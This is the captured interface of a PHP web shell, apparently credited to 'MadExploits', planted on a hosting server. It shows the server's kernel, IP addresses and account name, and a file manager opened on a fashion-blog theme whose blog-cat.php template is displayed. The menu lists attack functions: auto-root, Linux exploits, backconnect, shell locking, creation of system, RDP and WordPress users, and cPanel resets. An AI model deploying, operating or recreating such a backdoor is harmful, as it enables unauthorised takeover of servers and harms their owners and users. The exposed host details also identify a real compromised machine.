Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.135.185.78
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
asd /
theme /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.ftpquota
12
B
-rw-------
about-us.php
4.63
KB
-rw-r--r--
blog-cat.php
6.74
KB
-rw-r--r--
blog-single.php
8.23
KB
-rw-r--r--
contact-us.php
12.42
KB
-rw-r--r--
index.php
29.3
KB
-rw-r--r--
recent-activities.php
9.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blog-cat.php
<?php include('includes/header.php');?> <!-- Celebrity Style --> <section class="Each-cat"> <div class="custom-container"> <h2 class="h2heading Blog_h2Heading">Fashion</h2> <div class="hr_v"></div> <div class="Grids-4 today_story_Grids"> <div class="today_story_items"> <a href="blog-single.php" aria-label="Today’s Stories"> <img class="Story_Logo" src="/img/fashion-1.png" alt="Today’s Stories" loading="lazy"> <div class="today_story_txt"> <h2 class="font-11 today_story_tag">fashion</h2> <p class="font-18 today_story_blog">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Something</p> <p class="font-12 today_story_auth"> By <span>Samantha Wheeler</span> </p> </div> </a> </div> <!-- items 1 --> <div class="today_story_items"> <a href="javascript:void(0)" aria-label="Today’s Stories"> <img class="Story_Logo" src="/img/fashion-2.png" alt="Today’s Stories" loading="lazy"> <div class="today_story_txt"> <h2 class="font-11 today_story_tag">fashion</h2> <p class="font-18 today_story_blog">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Something</p> <p class="font-12 today_story_auth"> by<span>Daniel Hardman</span> </p> </div> </a> </div> <!-- items 1 --> <div class="today_story_items"> <a href="javascript:void(0)" aria-label="Today’s Stories"> <img class="Story_Logo" src="/img/fashion-3.png" alt="Today’s Stories" loading="lazy"> <div class="today_story_txt"> <h2 class="font-11 today_story_tag">fashion</h2> <p class="today_story_blog">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Something</p> <p class="font-12 today_story_auth"> by <span>robert zane</span> </p> </div> </a> </div> <!-- items 1 --> <div class="today_story_items"> <a href="javascript:void(0)" aria-label="Today’s Stories"> <img class="Story_Logo" src="/img/fashion-4.png" alt="Today’s Stories" loading="lazy"> <div class="today_story_txt"> <h2 class="font-11 today_story_tag">fashion</h2> <p class="font-18 today_story_blog">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Something</p> <p class=" font-12 today_story_auth"> by <span>robert zane</span> </p> </div> </a> </div> <!-- items 1 --> <div class="today_story_items"> <a href="javascript:void(0)" aria-label="Today’s Stories"> <img class="Story_Logo" src="/img/fashion-5.png" alt="Today’s Stories" loading="lazy"> <div class="today_story_txt"> <h2 class="font-11 today_story_tag">fashion</h2> <p class="font-18 today_story_blog">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Something</p> <p class="font-12 today_story_auth"> By <span>Samantha Wheeler</span> </p> </div> </a> </div> <!-- items 1 --> <div class="today_story_items"> <a href="javascript:void(0)" aria-label="Today’s Stories"> <img class="Story_Logo" src="/img/cl2.png" alt="Today’s Stories" loading="lazy"> <div class="today_story_txt"> <h2 class="font-11 today_story_tag">Celebrity Style</h2> <p class="font-18 today_story_blog">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Something</p> <p class="font-12 today_story_auth"> by<span>Daniel Hardman</span> </p> </div> </a> </div> <!-- items 1 --> <div class="today_story_items"> <a href="javascript:void(0)" aria-label="Today’s Stories"> <img class="Story_Logo" src="/img/blog-3.png" alt="Today’s Stories" loading="lazy"> <div class="today_story_txt"> <h2 class="font-11 today_story_tag">hopping</h2> <p class="today_story_blog">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Something</p> <p class="font-12 today_story_auth"> by <span>robert zane</span> </p> </div> </a> </div> <!-- items 1 --> <div class="today_story_items"> <a href="javascript:void(0)" aria-label="Today’s Stories"> <img class="Story_Logo" src="/img/blog-4.png" alt="Today’s Stories" loading="lazy"> <div class="today_story_txt"> <h2 class="font-11 today_story_tag">video</h2> <p class="font-18 today_story_blog">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Something</p> <p class=" font-12 today_story_auth"> by <span>robert zane</span> </p> </div> </a> </div> <!-- items 1 --> </div> <div class="center"> <div class="pagination pagination1 pagination3 pagination4 pagination6"> <a href="#">«</a> <a href="#">1</a> <a href="#" class="active">2</a> <a href="#">3</a> <a href="#">4</a> <a href="#">5</a> <a href="#">6</a> <a href="#">»</a> </div> </div> </div> </section> <?php include('includes/footer.php');?>
Close